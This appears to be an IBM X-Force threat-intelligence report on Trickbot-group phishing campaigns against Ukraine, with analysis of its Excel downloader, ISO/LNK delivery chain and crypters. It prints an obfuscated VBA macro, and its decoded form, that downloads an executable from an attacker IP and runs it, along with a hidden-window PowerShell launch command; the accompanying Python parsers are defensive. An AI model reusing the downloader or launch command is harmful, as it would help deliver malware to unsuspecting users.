In the course of ongoing research, our team at IBM Security X-Force has uncovered evidence indicating that the Russia-based cybercriminal syndicate “Trickbot group” has been systematically attacking Ukraine since the Russian invasion — an unprecedented shift, as the group had not previously targeted Ukraine. Between mid-April and mid-June of 2022 the Trickbot group, tracked by X-Force as ITG23 and also known as Wizard Spider, DEV-0193, and the Conti group, conducted at least six campaigns — two of which were discovered by X-Force — against Ukraine, during which it deployed IcedID, CobaltStrike, AnchorMail, and Meterpreter. Prior to the Russian invasion, ITG23 had not been known to target Ukraine, and much of the group’s malware was even configured not to execute on systems where the Ukrainian language was detected.
ITG23’s campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection.
ITG23 is a financially motivated cybercriminal gang known primarily for developing the Trickbot banking Trojan, which was first identified in 2016; since that time the group has used its payloads to gain a foothold in victim environments for ransomware attacks, including Ryuk, Conti, and Diavol. The systematic attacks observed against Ukraine include reported and suspected phishing attacks against Ukrainian state authorities, Ukrainian individuals and organizations, and the general population. Successful attacks that resulted in data theft or ransomware would provide ITG23 with additional extortion opportunities, and particularly damaging attacks could harm Ukraine’s economy.
The observed activities reported in this blog highlight a trend of this group choosing targets that align with Russian state interests against the backdrop of the ongoing conflict. In addition to an announcement by the Conti Ransomware group (which IBM tracks as part of ITG23) that they would act in support of Russian state interests at the beginning of the invasion of Ukraine, leaked chats between ITG23 members indicated that two senior individuals within the group had previously discussed in mid-April 2021 the targeting of entities that “work against the Russian Federation” and agreed that they were (Russian) “patriots.” Additionally, the Executive Director of Bellingcat claimed to have received a tip that a cybercriminal group was in communication with Russia’s Federal Security Service (FSB).
While investigating these campaigns, X-Force analysts also spotted new malware and tools being used by ITG23: a malicious Excel downloader used to deliver the payloads, a self-extracting archive (SFX) designed to drop and build ITG23 payloads such as AnchorMail, and a malware crypter X-Force has dubbed “Forest”. Of note, the Forest crypter has also been used with the Bumblebee malware, providing further evidence that ITG23 is behind Bumblebee. In this article, we provide details on the six campaigns we identified and describe the new malware and tools used during these attacks.
Trickbot Group Campaigns Target Ukraine
X-Force analysts have investigated at least six ITG23 campaigns specifically targeting Ukraine that took place between mid-April and mid-June. Four of these campaigns have been disclosed by CERT-UA, which tracks them under the group name UAC-0098, while this analysis introduces two newly uncovered campaigns by X-Force. Following our analysis of these campaigns, X-Force assesses:
ITG23 itself is controlling the delivery of the emails and malware — i.e., they are not executed by independent distribution affiliates. None of these campaigns are consistent with the techniques that known ITG23 third-party distribution affiliates are using to deliver the payloads to their targets. In 2021, X-Force analysts tracked several campaigns that were probably carried out directly by ITG23 personnel.
Three of the six campaigns use a malicious Excel downloader that has not been observed in other campaigns.
Two campaigns use ISO image files to distribute the payloads; these ISO files are probably created by a boutique ISO builder that has supplied previous campaigns delivering ITG23 payloads.
Five of the six campaigns directly download CobaltStrike, Meterpreter, or AnchorMail onto the target machine. Typically, these payloads are downloaded later during infections commencing with malware such as Trickbot, Emotet, or IcedID, suggesting these attacks are part of targeted campaigns during which ITG23 is willing to immediately deploy higher-value backdoors.
The CobaltStrike and IcedID payloads, which were used in four of the six campaigns, all use ITG23’s Tron, Hexa, or Forest crypters. The presence of an ITG23 crypter with a sample is a strong indication that its developer, distributor, or operator may either be part of ITG23 or has a partnership with the group. Crypters are applications designed to encrypt and obfuscate malware to evade analysis by antivirus scanners and malware analysts.
Campaign #1: ITG23 Delivers IcedID in Mid-April
In mid-April, ITG23 used phishing emails to deliver a malicious Excel file (described in detail below) to targets in Ukraine that downloaded and installed IcedID. ITG23 has a very close relationship with the IcedID group dating back several years and is likely relying on IcedID to obtain initial access into a victim’s environment after having discontinued the use of Trickbot and Bazarloader as of December 2021 and February 2022, respectively. According to CERT-UA, the campaign’s targeting consisted of “mass distribution among citizens” of Ukraine, suggesting less discriminate targeting within the country. The malicious spreadsheets used Ukrainian-language filenames translating to “List of mobilized citizens.xls”, “Mobilization list.xls”, and “Mobilization register.xls”. The IcedID samples downloaded during this campaign used ITG23’s Tron and Hexa crypters, further linking this campaign with ITG23.
Campaign #1 IOCs:
ac1d19c5942946f9eee6bc748dee032b97eb3ec3e4bb64fead3e5ac101fb1bc8 (Tron crypter)
55df2954add86715fc3d728459d79a6d2b88d34d9f23fafe9c5a573bb773d9e9 (Hexa crypter)
Campaign #2: ITG23 Delivers CobaltStrike in Mid-April
Shortly after the above campaign in mid-April, ITG23 used a similar malicious Excel file to download a CobaltStrike sample that used the ITG23 “Tron” crypter. CERT-UA called this campaign a “cyberattack on state organizations of Ukraine” and disclosed that the attacker used emails with a Ukrainian-language subject translating to “Urgent! Unblocking Azovstal Urgently! Unlocking ‘Azovstal’”. A malicious Excel spreadsheet used in this campaign was uploaded to the VirusTotal repository from Ukraine with a Ukrainian-language filename translating to “The military in Azovstal”. The reported targeting of state organizations and the direct download of CobaltStrike suggest this was a more targeted attack against specific victims.
Campaign #2 IOCs:
Campaign #3: ITG23 Delivers Meterpreter in Late-April
In late April, CERT-UA released details of a phishing campaign delivering Meterpreter which it assessed was associated with the Trickbot group. The campaign used emails with a Ukrainian-language subject translating to “Decree of the Press Office of the European Union No. 576/22 on uninterrupted security measures” to deliver an ISO image file. CERT-UA stated that the attack was against “the state authorities of Ukraine.” Similar to Campaign #2, the reported targeting of state organizations and the direct download of Meterpreter suggest this campaign was directed at specific targets.
X-Force analysts have uncovered additional information tying this ISO image file and campaign to ITG23. CERT-UA describes an execution sequence in which the embedded Microsoft Shortcut (LNK) file executes a PowerShell script “z.ps1” using the command “-exec bypass -w h -file z.ps1” that drops a Ukrainian-themed decoy document and executes the Meterpreter executable (b.exe). A nearly identical execution sequence was used during an ITG23 campaign against Ukraine in late May (Campaign #5) described further below.
We suspect that these ISO images are being sourced from a builder using UltraISO or PyCdlib to create the disk images. ITG23 and its distribution affiliates such as Hive0107 (aka TA578) previously have sourced ISOs that are probably from this builder. In February and March, two campaigns, one of which belonged to Hive0107, used ISO images to deliver IcedID that are similar to the ISOs used in late April (Campaign #3) and late May (Campaign #5) against Ukraine. For example:
Both ISOs contain LNK files created on the same machine “desktop-ouvurbp” and with other identical metadata.
Both ISOs use the same PowerShell command identified in April: “-exec bypass -w h -file z.ps1”.
The PowerShell script used in March is similar to those used in Campaigns #3 and #5 using the “Start-Process” command to drop a decoy document and execute a PE file.
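Two of the pivots above, the PowerShell arguments stored in the shortcut and the machine name in its TrackerData block, can be read straight from the LNK binary. The parser below is an added example written for this article, not X-Force’s or CERT-UA’s tooling; it follows the MS-SHLLINK layout and parses a minimal .lnk that it constructs in memory from the values quoted above, with zeroed GUIDs and no target ID list.

```python
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# LinkFlags bits from MS-SHLLINK, in the order the optional structures appear.
FLAGS = {"HasLinkTargetIDList": 0x01, "HasLinkInfo": 0x02, "HasName": 0x04,
         "HasRelativePath": 0x08, "HasWorkingDir": 0x10, "HasArguments": 0x20,
         "HasIconLocation": 0x40, "IsUnicode": 0x80}
TRACKER_SIG = 0xA0000003  # TrackerDataBlock: carries the NetBIOS name of the creating machine

def build_sample_lnk(machine_id, arguments, with_tracker=True):
    """Constructed minimal shortcut: header, a Unicode Arguments string and
    (optionally) a TrackerDataBlock with zeroed GUIDs. Not a real sample."""
    flags = FLAGS["HasArguments"] | FLAGS["IsUnicode"]
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    tracker = b""
    if with_tracker:
        tracker = (struct.pack("<IIII", 0x60, TRACKER_SIG, 0x58, 0)
                   + machine_id.encode("ascii").ljust(16, b"\0") + b"\0" * 64)
    return header + args + tracker + struct.pack("<I", 0)  # terminal block

def parse_lnk(data):
    """Walk the shortcut and return its command-line arguments and the
    TrackerData machine ID (None when the block is absent)."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    pos = 0x4C
    if flags & FLAGS["HasLinkTargetIDList"]:   # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAGS["HasLinkInfo"]:           # skip LinkInfo by its own size field
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & FLAGS["IsUnicode"])
    strings = {}
    for key in ("HasName", "HasRelativePath", "HasWorkingDir", "HasArguments", "HasIconLocation"):
        if flags & FLAGS[key]:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * (2 if is_unicode else 1)]
            pos += 2 + len(raw)
            strings[key[3:]] = raw.decode("utf-16-le" if is_unicode else "cp1252")
    machine_id = None
    while pos + 8 <= len(data):                # ExtraData blocks until size < 4
        block_size, sig = struct.unpack_from("<II", data, pos)
        if block_size < 4:
            break
        if sig == TRACKER_SIG:                 # MachineID sits 16 bytes into the block
            machine_id = data[pos + 16:pos + 32].split(b"\0", 1)[0].decode("ascii", "replace")
        pos += block_size
    return {"arguments": strings.get("Arguments"), "machine_id": machine_id,
            "working_dir": strings.get("WorkingDir")}
```

Running the same parser over the shortcuts from two campaigns and comparing the returned machine_id and arguments is the comparison the text describes.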
Campaign #3 IOCs:
Related ISO images used in February and March 2022 to deliver IcedID:
Campaign #4: ITG23 Delivers AnchorMail in Early May
In early May, X-Force discovered a campaign using a malicious Excel file very similar to those used in the first two campaigns that downloaded AnchorMail, a backdoor developed by ITG23 and based on their AnchorDNS malware. It is unusual to see Anchor backdoors downloaded directly as the first stage of an attack; typically, they are installed later in the infection. Their use suggests that this campaign may have been targeted against specific individuals or organizations, although we lack information on the specific target set.
The spreadsheet was uploaded to the VirusTotal repository on May 5 from Ukraine with the name Nuclear.xls – suggesting an alarming lure. The file was downloaded from a domain using the Ukrainian country code top-level domain: “lviv.uz[.]ua”. When executed, the spreadsheet downloads a WinRAR self-extracting archive (SFX) (see below for additional details) that delivers the AnchorMail backdoor. We have also identified other ITG23 payloads using this SFX as part of their installation sequence, including IcedID and CobaltStrike.
Campaign #4 IOCs
Staging URL (Excel)
Staging URL (AnchorMail SFX)
Campaign #5: ITG23 Delivers CobaltStrike in Late May
X-Force analysts have also identified an ITG23 campaign against Ukraine that likely took place in late May or early June. The campaign used an ISO image file created on May 31 that is very similar to the one described in Campaign #3 from late April. The ISO was uploaded to the VirusTotal repository on June 2, 2022, from Ukraine with a Ukrainian-language filename translating to “Message CN07.iso”. The embedded Microsoft Shortcut file executes the PowerShell file z.ps1, which drops a PDF decoy customs declaration form and executes a CobaltStrike executable (b.exe).
This CobaltStrike sample uses a new ITG23 malware crypter X-Force has dubbed “Forest” (see below for additional details). Notably, this new Forest crypter is also being used with Bumblebee loader samples, adding further evidence that this new loader family is built and operated by ITG23.
Campaign #5 IOCs:
Campaign #6: ITG23 Delivers CobaltStrike in Mid-June
In mid-June, X-Force analysts identified a suspicious CobaltStrike sample using ITG23’s Tron crypter, suggesting a relationship to ITG23 or one of its partners or affiliates. A few days later CERT-UA released a report indicating that this CobaltStrike sample was used in recent phishing attacks against “critical infrastructure facilities of Ukraine.” To deliver the payload, the attacker used emails purporting to be from the State Tax Service of Ukraine, with a Ukrainian-language subject translating to “Report non-payment of the tax”, carrying a malicious document whose title translates to “Imposition of penalties.docx”. The document was contained within a Zip archive whose name translates to “Imposition of Penalty Sanctions.zip”.
The email and document lure contain information about requirements to pay taxes in Ukraine. Of note, the text in the document lure is identical to that posted on this web page about Ukrainian tax requirements. When opened, the malicious document uses the vulnerability CVE-2022-30190 (“Follina”) to download an HTML file that in turn downloads and executes the CobaltStrike Beacon. Of note, the SSL public key embedded in this Beacon is identical to the one in the Beacon used in Campaign #5, indicating that these two Beacons can be traced back to the same CobaltStrike Team Server installation.
Campaign #6 IOCs:
Staging URL (html)
Staging URL (CS)
Attacks Signal Cybercriminal Support for Russian Interests
ITG23 activity has previously avoided Ukrainian targets. Russian-speaking criminal underground communities have long discouraged, if not outright banned, going after former Soviet countries and, while not relevant to Ukraine, members of the Commonwealth of Independent States (CIS). This code of conduct likely came about to avoid creating victims in malware operators’ countries of residence, in large part to avoid antagonizing law enforcement. It also had the added benefit of encouraging Russian-speaking criminal cooperation based on a shared sense of us-versus-the-rest solidarity. According to an indictment released by the U.S. Department of Justice (DOJ) in 2021, ITG23 (the group behind Trickbot) operated from multiple former Soviet countries, including Belarus, Russia, and Ukraine.
However, ideological divisions and allegiances have increasingly become apparent within the Russian-speaking cybercriminal ecosystem this year, with ITG23 as a primary case study. Conti Ransomware group declared a pro-Russian stance early in the conflict, stating their commitment to attack entities that would oppose Moscow. The ContiLeaks, which exposed message logs and other files exchanged between members of ITG23, were reportedly obtained and leaked by a Ukrainian researcher.
Although we have yet to observe similar activity on a wider scale, these campaigns provide evidence that Ukraine is in the crosshairs of prominent Russian cybercriminal groups. Ukraine has been targeted with a wide variety of cyber activity leading up to and since the invasion, including distributed-denial-of-service (DDoS) attacks and defacements and attempted destructive activity attributed to Russian state-sponsored actors.
New ITG23 Malware, Tools Used in Attacks on Ukraine
X-Force analysts detected several new malware and tools employed during these campaigns:
A malicious Excel file used to download the payloads.
A self-extracting archive (SFX) designed to drop and build ITG23 payloads such as AnchorMail, CobaltStrike, and IcedID.
A new ITG23 malware crypter X-Force has dubbed “Forest.”
Malicious Excel Downloader
Three of the six campaigns targeting Ukraine used similar malicious Excel downloaders. The downloader code is stored as a simple macro within the Excel file which is set to run upon opening the file, provided the user has macros enabled. If macros are disabled, the malicious code is unable to run.
The macro code downloads a file from a hardcoded URL, saves it to the file system, and then executes the downloaded file. Two variants of the code are present across the analyzed samples, one which downloads an executable file which it then runs without arguments, and a second which downloads a DLL file which it then runs using the Windows rundll32 command.
The samples all make use of basic obfuscation techniques within the macro code, with some function and variable names replaced with randomly generated names, and string values encoded as hexadecimal ASCII and split into multiple parts that are decoded and concatenated at run time. An example of one of the obfuscated macros is as follows:
Application.ScreenUpdating = False
Dim xHttp: Set bnntwxnuvivrf = CreateObject(itslnwmojhejvmg("4d6963726f736f") & itslnwmojhejvmg("66742e584d4c48545450"))
Dim bStrm: Set krzbmwewmr = CreateObject(itslnwmojhejvmg("41646f64622e53747265") & itslnwmojhejvmg("616d"))
bnntwxnuvivrf.Open itslnwmojhejvmg("474554"), itslnwmojhejvmg("687474703a2f2f3139332e3134392e3137") & itslnwmojhejvmg("362e3137322f61746163686d656e742e657865"), False
Dim sweidpa As String
sweidpa = Environ("AppData")
.Type = 1
.savetofile sweidpa & itslnwmojhejvmg("5c736572766963657a2e") & itslnwmojhejvmg("657865"), 2
Shell (sweidpa & itslnwmojhejvmg("5c736572") & itslnwmojhejvmg("766963657a2e657865"))
Application.ScreenUpdating = True
Decoding the hex strings results in the following cleaned-up code:
Application.ScreenUpdating = False
Dim xHttp: Set bnntwxnuvivrf = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set krzbmwewmr = CreateObject("Adodb.Stream")
bnntwxnuvivrf.Open "GET", "http://193.149.176.172/atachment.exe", False
Dim sweidpa As String
sweidpa = Environ("AppData")
.Type = 1
.savetofile Environ("AppData") & "\servicez.exe", 2
Shell (Environ("AppData") & "\servicez.exe")
Application.ScreenUpdating = True
The download URL, file name, and save file path all differ across the samples, and are presented below. Note that the first sample appears to have a typo in the execution file name, which does not match the save file name, so this sample would not have executed correctly.
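As an added example (not code from the article), the Python below automates the decoding step just shown: it infers the random helper name, collapses each helper("hex") & helper("hex") run into a plain string, and then reads off the staging URL, the saved file name and the executed file name, flagging the save/execute mismatch noted for one sample. Its input is the obfuscated macro above, retyped with straight quotes.

```python
import re
from collections import Counter

# Constructed input: the obfuscated macro quoted above, retyped with straight
# quotes (the only change from the page) so it can be parsed as text.
SAMPLE_MACRO = r'''
Application.ScreenUpdating = False
Dim xHttp: Set bnntwxnuvivrf = CreateObject(itslnwmojhejvmg("4d6963726f736f") & itslnwmojhejvmg("66742e584d4c48545450"))
Dim bStrm: Set krzbmwewmr = CreateObject(itslnwmojhejvmg("41646f64622e53747265") & itslnwmojhejvmg("616d"))
bnntwxnuvivrf.Open itslnwmojhejvmg("474554"), itslnwmojhejvmg("687474703a2f2f3139332e3134392e3137") & itslnwmojhejvmg("362e3137322f61746163686d656e742e657865"), False
Dim sweidpa As String
sweidpa = Environ("AppData")
.Type = 1
.savetofile sweidpa & itslnwmojhejvmg("5c736572766963657a2e") & itslnwmojhejvmg("657865"), 2
Shell (sweidpa & itslnwmojhejvmg("5c736572") & itslnwmojhejvmg("766963657a2e657865"))
Application.ScreenUpdating = True
'''
HEX_CALL = re.compile(r'(\w+)\("([0-9A-Fa-f]+)"\)')  # identifier("hex literal")

def find_decoder_name(macro):
    """The helper's name is random per sample, so infer it: it is the
    identifier most often called with a hex-only string literal."""
    counts = Counter(name for name, _ in HEX_CALL.findall(macro))
    if not counts:
        raise ValueError("no hex-string decoder calls found")
    return counts.most_common(1)[0][0]

def deobfuscate(macro):
    """Collapse each run of helper("hex") & helper("hex") ... into one plain
    string literal; the rest of the macro is left untouched."""
    name = re.escape(find_decoder_name(macro))
    run = re.compile(rf'{name}\("[0-9A-Fa-f]+"\)(?:\s*&\s*{name}\("[0-9A-Fa-f]+"\))*')

    def decode(match):  # callable replacement: returned text is used verbatim
        parts = [bytes.fromhex(h).decode("ascii") for _, h in HEX_CALL.findall(match.group(0))]
        return '"' + "".join(parts) + '"'

    return run.sub(decode, macro)

def extract_iocs(decoded):
    """Read the staging URL, saved file name and executed file name from the
    cleaned macro, and flag the save/execute mismatch the text notes."""
    def literals(expr):  # concatenated string literals of a VBA `a & "b"` expression
        expr = re.sub(r'Environ\("[^"]*"\)', "", expr)  # Environ("AppData") is not a literal
        return "".join(re.findall(r'"([^"]*)"', expr))
    url = re.search(r'"(https?://[^"]+)"', decoded)
    save = re.search(r'\.savetofile\s+(.+?),\s*2', decoded, re.IGNORECASE)
    shell = re.search(r'\bShell\s*\((.+)\)', decoded)
    save_name = literals(save.group(1)) if save else None
    exec_name = literals(shell.group(1)) if shell else None
    return {"url": url.group(1) if url else None, "save_name": save_name,
            "exec_name": exec_name,
            "names_match": save_name is not None and save_name == exec_name}
```

A names_match of False is the condition described for the first sample: the macro saves one file name and tries to execute another.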